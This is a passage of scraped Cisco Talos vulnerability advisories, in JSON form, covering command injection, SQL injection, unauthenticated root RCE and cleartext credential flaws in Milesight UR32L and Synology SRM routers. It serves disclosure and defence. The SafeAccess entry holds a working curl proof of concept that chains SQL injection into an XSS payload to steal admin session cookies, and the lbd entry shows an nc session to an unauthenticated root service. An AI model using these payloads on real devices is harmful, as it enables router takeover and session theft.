5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L zebra vlan_name OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "MULTIPLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-25582", "CVE-2023-25583"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1723", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1723", "cvss": {"score": 5.8, "vector": "AV:N/AC:L/Au:M/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T19:04:36", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1706\n\n## Milesight UR32L vtysh_ubus toolsh_excute.constprop.1 OS command injection vulnerabilities\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-24519,CVE-2023-24520\n\n##### SUMMARY\n\nTwo OS command injection vulnerability exist in the vtysh_ubus toolsh_excute.constprop.1 functionality of Milesight UR32L v32.3.0.5. A specially-crafted network request can lead to command execution. An attacker can send a network request to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n8.8 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial cellular router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe Milesight router offers several functionalities through the `/cgi` endpoint. The \u201ccore\u201d functionality we are considering is called `yruo_tools`, in this \u201ccore\u201d there are two functions: \u201cping\u201d and \u201ctraceroute\u201d. For instance, the payload for the `/cgi` API to use the \u201ctraceroute\u201d functionality is would look likes this:\n \n \n {\n \"id\": 60,\n \"execute\": 1,\n \"core\": \"yruo_tools\",\n \"function\": \"traceroute\",\n \"values\": [\n {\n \"host\": \"<some_host>\"\n }\n ]\n } The ping one would differ for the `\"function\"` value that would be \"ping\". \n \n\nBoth \u201cping\u201d and \u201ctraceroute\u201d will end up calling the `vtysh_ubus`\u2019s `toolsh_excute.constprop.1` function.\n \n \n void toolsh_excute.constprop.1(void *ping_or_trace,undefined4 params,void *rcp_session)\n \n {\n [... variable declaration ...]\n \n [... variable initialization ...]\n [...]\n get_tool_path.constprop.4(ping_or_trace,1,rcp_session,(char)lock_path);\n get_tool_path.constprop.4(ping_or_trace,0,rcp_session,(char)log_path);\n if (ping_or_trace == (void *)0x0) {\n command = \"ping\";\n }\n else {\n command = \"trace\";\n }\n snprintf(shell_cmd,0x120,\"%s %s %s %s %s &\",\"/usr/sbin/webtools.sh\",command,params,log_path,\n lock_path); [1]\n printf(\"** lock=%s **\\n** path=%s **\\n** command=%s **\\n\",lock_path,log_path,shell_cmd);\n does_lock_exist = access((char *)lock_path,0);\n if (does_lock_exist == 0) {\n [..]\n }\n else {\n lock_fd = open((char *)lock_path,0x41,0);\n if (-1 < lock_fd) {\n close(lock_fd);\n system(shell_cmd); [2]\n [...]\n }\n [...]\n }\n [...]\n } This function based on the `ping_or_trace` parameters will compose, at `[1]`, the string `/usr/sbin/webtools.sh <ping/trace> <params> <log_path> <lock_path> &`. If another \"ping\" or \"traceroute\" command is not currently running, checked with the lock file, the composed string will reach the `system` function at `[2]`. Because the `params` parameters is not checked or parsed enough, this can lead to an OS command injection at `[2]`. Following the \"ping\" and \"traceroute\" related function that will call the vulnerable `toolsh_excute.constprop.1` function.\n \n\n#### CVE-2023-24519 - tools_ping\n\nThe `tools_ping` is the function responsible for managing the ping function in the `yruo_tools` \u201ccore\u201d:\n \n \n void tools_ping(undefined4 param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4,\n undefined4 *data)\n \n {\n [... variable declaration ...]\n \n [... variable initialization ...]\n json_msg_output(\"!! yruo_tools.ping params\",data);\n blob_buf_init(b,0);\n len = __bswapsi2(*data);\n blobmsg_parse(tools_ping_policy,2,tb,data + 1,(len & 0xffffff) - 4);\n if ((tb[0] == (blob_attr *)0x0) || (tb[1] == (blob_attr *)0x0)) {\n blobmsg_add_string(b,\"error\",\"lack of param to test\");\n }\n else {\n blob_string = (char *)blobmsg_get_string((char *)tb[0]);\n strncpy(ping_host,blob_string,0x40); [3]\n blob_string = (char *)blobmsg_get_string((char *)tb[1]);\n strncpy(ubus_rpc_session,blob_string,0x40);\n strtok(ping_host,\" \"); [4]\n toolsh_excute.constprop.1(0,ping_host,ubus_rpc_session);\n }\n [...]\n }\n \n\nThe data are transmitted through `blobmsg` structures, the two variable that eventually will reach this function transmitted are: \\- `host`: a parameter that should represent the host that will be pinged \\- `ubus_rpc_session`: a parameter that will be used to check if the provided request was performed by someone that had logged in successfully\n\nAt `[3]` the `host` parameter is copied and then, at `[4]`, only the first word, separated by a space, is taken into consideration. This first word will became the `params` parameter for the `toolsh_excute.constprop.1`. Here the only parsing performed on the `host` parameter is considering only the first word before a space. This is not enough to prevent an OS command injection vulnerability\n\n#### CVE-2023-24520 - tools_trace\n\nThe `tools_trace` is the function responsible for managing the \u201ctraceroute\u201d function in the `yruo_tools` \u201ccore\u201d:\n \n \n void tools_trace(undefined4 param_1,undefined4 param_2,undefined4 param_3,undefined4 param_4,\n undefined4 *data)\n \n {\n [... variable declaration ...]\n \n [... variable initialization ...]\n json_msg_output(\"!! yruo_tools.traceroute params\",data);\n blob_buf_init(b,0);\n len = __bswapsi2(*data);\n blobmsg_parse(tools_trace_policy,2,tb,data + 1,(len & 0xffffff) - 4);\n if ((tb[0] == (blob_attr *)0x0) || (tb[1] == (blob_attr *)0x0)) {\n blobmsg_add_string(b,\"error\",\"lack of param to test\");\n }\n else {\n tmp = (char *)blobmsg_get_string((char *)tb[0]);\n strncpy(host,tmp,0x40); [5]\n tmp = (char *)blobmsg_get_string((char *)tb[1]);\n strncpy(ubus_rcp_session,tmp,0x40);\n strtok(host,\" \"); [6]\n toolsh_excute.constprop.1(1,host,ubus_rcp_session);\n }\n [...]\n }\n \n\nThe data are transmitted through `blobmsg` structures, the two variable that eventually will reach this function transmitted are: \\- `host`: a parameter that should represent the host that will used for the \u201ctraceroute\u201d functionality \\- `ubus_rpc_session`: a parameter that will be used to check if the provided request was performed by someone that had logged in successfully\n\nAt `[5]` the `host` parameter is copied and then, at `[6]`, only the first word, separated by a space, is taken into consideration. This first word will became the `params` parameter for the `toolsh_excute.constprop.1`. Here the only parsing performed on the `host` parameter is considering only the first word before a space. This is not enough to prevent an OS command injection vulnerability\n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1712\n\nPrevious Report\n\nTALOS-2023-1694\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L vtysh_ubus toolsh_excute.constprop.1 OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-24519", "CVE-2023-24520"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1706", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1706", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:53:30", "description": "### Summary\n\nAn exploitable command execution vulnerability exists in the lbd service functionality of Qualcomm lbd 1.1, as present in Synology SRM 1.2.3 RT2600ac 8017-5. A specially crafted debug command can overwrite arbitrary files with controllable content, resulting in remote code execution. An attacker can send an unauthenticated message to trigger this vulnerability.\n\n### Tested Versions\n\nQualcomm lbd 1.1 \nSynology SRM 1.2.3 RT2600ac 8017-5\n\n### Product URLs\n\n<https://www.synology.com/en-global/srm>\n\n### CVSSv3 Score\n\n9.6 - CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-73 - External Control of File Name or Path\n\n### Details\n\nSynology Router Manager (SRM) is a Linux-based operating system for Synology Routers developed by Synology.\n\nSRM ships a binary called \u201cQualcomm Load Balancing Daemon\u201d (`lbd`), which is used for monitoring and debugging a load-balancing feature in the WiFi interfaces. This service can be managed via network, and there are two instances of it running at the same time, one for the main WiFi (port 7787) and one for the guest WiFi (port 7786). The two instances are configured in the exact same way, except for the interface they manage. Both ports are reachable via LAN.\n\nThe service has no authentication and shows a menu:\n \n \n $ nc 192.168.1.1 7786\n Use `h' and `help' for help messages\n Use `dbg here' to see log messages; other dbg cmds for log level\n @\n \n\nIn the `dbg` menu, there\u2019s an option to \u201credirect\u201d debug output to a file.\n \n \n @ dbg h\n h [cmd] -- short help (first line of each help message).\n help [cmd] -- long help.\n q -- quit interactive menu\n s -- print dbg status\n level [{<module>|all} [[=] {err|info|debug|dump}] -- print/change module debug level\n here [-off] -- copy debug messages to current shell context\n redirect {[-a] <path>} | -off -- redirect dbg messages to file\n \n\nAn attacker could connect to this port, enable debug output to a file, and influence it in a way that interpretable output gets written to executable files, in order to execute arbitrary code without authentication. Any command executed this way would be run as the root user:\n \n \n SynologyRouter> ps |grep [l]bd\n 29380 root 3032 S /usr/sbin/lbd -C /usr/syno/etc/wifi/lbd.conf -P 7787\n 29997 root 3036 S /usr/sbin/lbd -C /usr/syno/etc/wifi/lbd.guest.conf -P 7786\n \n\nNote that, while this service is normally reachable only within LAN, because of the issues described in TALOS-2020-1064 and TALOS-2020-1066, this service is exploitable also from the QuickConnect network, allowing a non-authenticated attacker to execute arbitrary code as root in any device connected to the QuickConnect VPN.\n\n### Timeline\n\n2020-05-04 - Vendor disclosure to Synology and Qualcomm \n2020-06-02 - Disclosure release deadline requested and Talos extended to 2020-09-30 \n2020-06-22 - 2nd extension requested; disclosure extended to 2020-10-30 \n2020-07-09 - Vendor (Qualcomm) assigned CVE-2020-11117 \n2020-08-28 - Vendor (Qualcomm) confirmed patch \n2020-10-29 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-29T00:00:00", "type": "talos", "title": "Synology SRM lbd service Command Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11117", "CVE-2020-27654"], "modified": "2020-10-29T00:00:00", "id": "TALOS-2020-1065", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1065", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:53:42", "description": "### Summary\n\nAn exploitable code execution vulnerability exists in the SafeAccess 1.2.1-0220 package of Synology SRM 1.2.3 RT2600ac 8017-5. A specially crafted domain access request can lead to an SQL injection. An attacker can send an HTTP request to trigger this vulnerability.\n\n### Tested Versions\n\nSynology SRM 1.2.3 RT2600ac 8017-5\n\n### Product URLs\n\n<https://www.synology.com/en-global/srm>\n\n### CVSSv3 Score\n\n8.3 - CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H\n\n### CWE\n\nCWE-89 - Improper Neutralization of Special Elements used in an SQL Command (\u2018SQL Injection\u2019)\n\n### Details\n\nSynology Router Manager (SRM) is a Linux-based operating system for Synology routers.\n\nSRM allows for installing additional packages to add new functionalities to the router. \nOne of the installable packages is \u201cSafeAccess\u201d, which can be used to track users in the local network in order to filter their Internet access (blacklisting websites, limiting the browsing time, etc.).\n\nFor example, a user can be put in a specific profile that limits the browsing of shopping websites. If the user then tries to connect to one of the blocked websites, a blocking page will be shown. In the blocking page, there\u2019s a button that allows to send a request to the network administrator, and ask the access anyway. At this point, the network administrator will receive a notification (in various configurable ways), and will have the possibility do deny or allow access via the web interface.\n\nThe request button sends an HTTP request:\n \n \n GET /cgi/request.cgi?_dc=1589562062753&domain=shopping.local HTTP/1.1 // [1]\n Host: shopping.local\n Connection: keep-alive\n X-Requested-With: XMLHttpRequest\n Referer: http://shopping.local/\n \n\nIn the example above the users asks for access to the blocked website \u201cshopping.local\u201d [1].\n\nThe `request.cgi` binary in the router handles the request. The requested domain is extracted and is eventually passed to the `libsynosafeaccesslog.so` library, which logs the request attempt by inserting it in a `sqlite` database in \u201c/usr/syno/etc/packages/SafeAccess/synosafeaccesslog/log.db\u201d. The query is built in function `syno::safeaccess::insert`:\n \n \n /* syno::safeaccess::insert(SQLite::Database&, std::basic_string, std::basic_string) */\n \n void __thiscall insert(safeaccess *this, Database *db, basic_string *table, basic_string *text) {\n basic_format(&fmt,\n \"INSERT OR IGNORE INTO %1% (id, text) VALUES((SELECT MAX(id)+1 FROM %1%),\\'%2%\\');\", // [2]\n table,text);\n _local_a8 = db;\n pbVar1 = feed_impl(&fmt,&local_a8);\n _local_9c = table;\n pbVar2 = feed_impl(pbVar1,&local_9c);\n str(&query,pbVar2);\n exec((Database *)this,query); // [3]\n ...\n return;\n }\n \n\nAt [2], the format string for the query is built, and we can see the second parameter, `text`, is wrapped in single quotes, however it has never been escaped before. This parameter is completely controllable and corresponds to the `domain` parameter sent via the \u201cGET\u201d request at [1]. \nFinally the query is passed to the function `SQLite::Database::exec` at [3], resulting in a SQL injection via the \u201cdomain\u201d parameter.\n\nFor reference, the full function call for `request.cgi` is the following:\n \n \n (gdb) bt\n #0 0xb574f9cc in SQLite::Database::exec(char const*) () from /lib/libSQLiteCpp.so.5.2\n #1 0xb5a98458 in syno::safeaccess::insert(SQLite::Database&, std::string const&, std::string const&) () from /var/packages/SafeAccess/target/lib/libsynosafeaccesslog.so.5.2\n #2 0xb5a9a8e0 in syno::safeaccess::Logger::add(syno::safeaccess::RequestLog const&, long) const () from /var/packages/SafeAccess/target/lib/libsynosafeaccesslog.so.5.2\n #3 0xb6cf6338 in syno::parentalcontrol::RequestSender::SendByMacIfname(std::string const&, std::string const&, std::string const&) () from /var/packages/SafeAccess/target/lib/libsynoparentalcontrol.so.1.2.1\n #4 0xb6cf5de8 in syno::parentalcontrol::RequestSender::SendByIp(std::string const&, std::string const&) () from /var/packages/SafeAccess/target/lib/libsynoparentalcontrol.so.1.2.1\n #5 0x00011704 in ?? ()\n #6 0x00011850 in ?? ()\n #7 0xb693b5bc in __libc_start_main () from /lib/libc.so.6\n \n\nBecause the `httpd` server is executed as the `root` user, an attacker could exploit this SQL injection to execute arbitrary code in the device.\n\n### Exploit Proof of Concept\n\nThe SQL injection described above allows to execute stacked queries, making this issue exploitable it in multiple ways.\n\nIn this proof-of-concept, we demonstrate one simple exploitation method: via the SQL injection, we connect to a different database and exploit a subsequent XSS in the SafeAccess \u201cProfile\u201d and \u201cActivity/Logs\u201d pages, in order to steal the session cookie of the web interface.\n \n \n $ sql='commit;'\\\n 'attach database \"/usr/syno/etc/packages/SafeAccess/synoaccesscontrol/database.db\" as x;'\\\n 'update x.profile set name=\"user<img src=/ onerror=\"\"alert(document.cookie)\"\"/>\" where id=3;'\n $ curl \"http://10.254.1.2/cgi/request.cgi?domain=%27);\"$(echo \"$sql\" | sed \"s/ /%20/g\")\"--\"\n \n\nThe proof-of-concept assumes there\u2019s one user profile (hence why `id=3`) configured in SafeAccess.\n\nOnce executed, the profile name for user id 3 will be changed into `user<img src=/ onerror=\"\"alert(document.cookie)\"\"/>`. When an administrator logs into the web interface and browses for the SafeAccess logs or profiles (because of a notification previously received via `request.cgi`), the Javascript will execute. This happens because the profile name is trusted, hence not sanitized before being inserted into the page.\n\nMoreover, note that the session cookie is accessible because of the issue described in TALOS-2020-1086.\n\n### Timeline\n\n2020-05-18 - Vendor Disclosure \n2020-11-30 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-18T00:00:00", "type": "talos", "title": "Synology SRM SafeAccess 1.2.1-0220 code execution Vvulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27659", "CVE-2020-27660"], "modified": "2020-05-18T00:00:00", "id": "TALOS-2020-1087", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2020-1087", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-08T19:04:40", "description": "# Talos Vulnerability Report\n\n### TALOS-2023-1710\n\n## Milesight UR32L urvpn_client cmd_name_action OS command injection vulnerabilities\n\n##### July 6, 2023\n\n##### CVE Number\n\nCVE-2023-24583,CVE-2023-24582\n\n##### SUMMARY\n\nTwo OS command injection vulnerabilities exist in the urvpn_client cmd_name_action functionality of Milesight UR32L v32.3.0.5. A specially crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger these vulnerabilities.\n\n##### CONFIRMED VULNERABLE VERSIONS\n\nThe versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.\n\nMilesight UR32L v32.3.0.5\n\n##### PRODUCT URLS\n\nUR32L - <https://www.milesight-iot.com/cellular/router/ur32l/>\n\n##### CVSSv3 SCORE\n\n8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n\n##### CWE\n\nCWE-77 - Improper Neutralization of Special Elements used in a Command (\u2018Command Injection\u2019)\n\n##### DETAILS\n\nThe Milesight UR32L is an industrial radio router. The router features include support for multiple VPNs, a router console shell, firewall and many others.\n\nThe router offers a service called Milesight VPN, which will connect to the Milesight VPN software. The binary client used for this service is `urvpn_client`. This binary will connect to the specified Milesight VPN server but will also listen for network request to allow the sender to change VPN settings. The function that will, eventually, parse the received data and modify the VPN settings is the `urvpn_client`\u2019s`execute_urvpn_command` function:\n \n \n undefined4 execute_urvpn_command(byte *data_buff)\n \n {\n [... variable declaration ...]\n \n json = utils_parse_string2json_object(data_buff);\n [... variable initialization ...]\n if (json == 0) {\n uVar2 = 0xffffffff;\n }\n else {\n json_get_value_by_key(json,\"type\",type_value,0x40);\n is_equal = strcmp(type_value,\"cmd_reconnect\");\n if (is_equal == 0) {\n sleep(5);\n cmd_reconnect_action();\n }\n else {\n is_equal = strcmp(type_value,\"cmd_subnet\");\n if (is_equal == 0) {\n [...]\n }\n else {\n is_equal = strcmp(type_value,\"cmd_name\");\n if (is_equal == 0) {\n json_get_value_by_key(json,\"name\",cmd_name,0x40); [1]\n cmd_name_action(cmd_name);\n }\n }\n }\n [...]\n }\n [...]\n }\n \n\nThis function parses a JSON. Based on the value of the string corresponding to the key `type`, the function will execute a specific command. If the type value is equal to `cmd_name`, the code at `[1]` will be reached and the `cmd_name_action` function will be called with, as argument, the string value corresponding to the key `name` in the JSON.\n\nFollowing the `cmd_name_action` function:\n \n \n undefined4 cmd_name_action(char* cmd_name)\n \n {\n [...]\n snprintf((char *)&formatted_string,0x200,\n \"ubus call yruo_urvpn set \\'{\\\"base\\\":\\\"urvpn_manage\\\", \\\"value\\\":{\\\"action\\\":2,\\\"device_ name\\\":\\\"%s\\\"}}\\'\"\n ,cmd_name);\n [...]\n system((char *)&formatted_string); [2]\n return 0;\n }\n \n\nThis function uses the provided `name` string value to compose a shell command that will be execute, at `[2]`, through the `system` function. This can lead to an OS command injection vulnerability.\n\nThere are two code paths to reach this vulnerable function, which are described as follows.\n\n#### CVE-2023-24582 - TCP handler\n\nIt is possible to reach the `execute_urvpn_command` function through a TCP connection. The function that will manage this connection is `tcp_execute_urvpn_command_wrap`:\n \n \n void tcp_execute_urvpn_command_wrap(undefined4 bufev,undefined4 param_2)\n \n {\n [... variable declaration ...]\n \n local_20 = param_2;\n local_1c = bufev;\n start_evbuff_ptr = bufferevent_get_input(bufev);\n input_line = (byte *)0x0;\n evbuffer_search_eol(ev_buffer,start_evbuff_ptr,0,&local_14,0);\n if (local_14 == 0) {\n [...]\n }\n else {\n input_line = (byte *)evbuffer_readln(start_evbuff_ptr,0,0);\n if (input_line != (byte *)0x0) {\n log_stuff(\"comtcpip.c\",0x4d,\"_comtcpip_readcb\",2,\"reveive TCP :%s\",input_line);\n execute_urvpn_command(input_line);\n [...]\n }\n }\n [...]\n } The function will receive the JSON data and eventually call the `execute_urvpn_command` with, as argument, the JSON received. No checks are performed on the received data that will eventually reach the `cmd_name_action`.\n \n\n#### CVE-2023-24583 - UDP handler\n\nIt is possible to reach the `execute_urvpn_command` function through a UDP connection. The function that will manage this connection is `tcp_execute_urvpn_command_wrap`:\n \n \n undefined4 udp_execute_urvpn_command_wrap(int socket)\n \n {\n [... variable declaration ...]\n \n recv_buff._0_4_ = 0;\n memset(recv_buff + 4,0,0x3fc);\n local_410 = 0x10;\n memset(recv_buff,0,0x400);\n sVar1 = recvfrom(socket,recv_buff,0x400,0,&sStack_420,&local_410);\n if (sVar1 == -1) {\n [...]\n }\n else if (sVar1 == 0) {\n [...]\n }\n else {\n log_stuff(\"comudp.c\",0x29,\"udp_read_cb\",1,\"Udp Read :[%s]\",recv_buff);\n uVar4 = execute_urvpn_command((byte *)recv_buff);\n }\n [...]\n } The function will receive the JSON data and eventually call the `execute_urvpn_command` with, as argument, the JSON received. No checks are performed on the received data that will eventually reach the `cmd_name_action`.\n \n\n##### VENDOR RESPONSE\n\nSince the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco\u2019s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html\n\n##### TIMELINE\n\n2023-02-14 - Initial Vendor Contact \n2023-02-21 - Vendor Disclosure \n2023-07-06 - Public Release\n\n##### Credit\n\nDiscovered by Francesco Benvenuto of Cisco Talos.\n\n* * *\n\nVulnerability Reports Next Report\n\nTALOS-2023-1718\n\nPrevious Report\n\nTALOS-2023-1695\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-07-06T00:00:00", "type": "talos", "title": "Milesight UR32L urvpn_client cmd_name_action OS command injection vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-24582", "CVE-2023-24583"], "modified": "2023-07-06T00:00:00", "id": "TALOS-2023-1710", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1710", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-12-02T16:53:30", "description": "### Summary\n\nAn information disclosure vulnerability exists in the dnsExit DDNS provider functionality of Synology SRM 1.2.3 RT2600ac 8017-5. A specially crafted man-in-the-middle attack can steal the dnsExit credentials to take over the registered subdomain. An attacker can impersonate the remote dnsExit servers to trigger this vulnerability.\n\n### Tested Versions\n\nSynology SRM 1.2.3 RT2600ac 8017-5 \nSynology DSM 6.2.3 25426 (confirmed by vendor)\n\n### Product URLs\n\n<https://www.synology.com/en-global/srm>\n\n### CVSSv3 Score\n\n4.0 - CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N\n\n### CWE\n\nCWE-319 - Cleartext Transmission of Sensitive Information\n\n### Details\n\nSynology Router Manager (SRM) is a Linux-based operating system for Synology routers.\n\nSRM supports DDNS (Dynamic DNS) for Synology\u2019s DDNS and a set of third-party providers. This feature allows a user to assign a DNS entry to their public IP address, in order to serve content remotely.\n\nOne of the third-party providers supported is [dnsExit](<https://www.dnsexit.com/Direct.sv?cmd=ipClients>). \nWhen this provider is used, the IP address update is performed by `/usr/syno/bin/ddns/dnsexit.php`:\n \n \n #!/usr/bin/php -d open_basedir=/usr/syno/bin/ddns\n <?php\n \n if ($argc !== 5) {\n echo 'badparam';\n exit();\n }\n \n $account = (string)$argv[1];\n $pwd = (string)$argv[2];\n $hostname = (string)$argv[3];\n $ip = (string)$argv[4];\n \n // check the hostname contains '.'\n if (strpos($hostname, '.') === false) {\n echo 'badparam';\n exit();\n }\n \n // only for IPv4 format\n if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4)) {\n echo \"badparam\";\n exit();\n }\n \n // [1]\n $url = 'http://update.dnsexit.com/RemoteUpdate.sv?login='.$account.'&password='.$pwd.'&host='.$hostname.'&myip='.$ip;\n \n $req = curl_init();\n curl_setopt($req, CURLOPT_URL, $url);\n $res = curl_exec($req);\n curl_close($req);\n \n\nAt [1] we can see that the request is performed over `http` rather than `https`, allowing an attacker to perform a man-in-the-middle attack and steal the dnsExit credentials.\n\n### Timeline\n\n2020-05-12 - Vendor Disclosure \n2020-06-02 - Disclosure release deadline requested and Talos extended to 2020-09-30 \n2020-06-22 - 2nd extension requested; disclosure extended to 2020-10-30 \n2020-10-29 - Public Release\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-29T00:00:00", "type": "talos", "title": "Synology SRM dnsExit DDNS provider information disclosure vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, 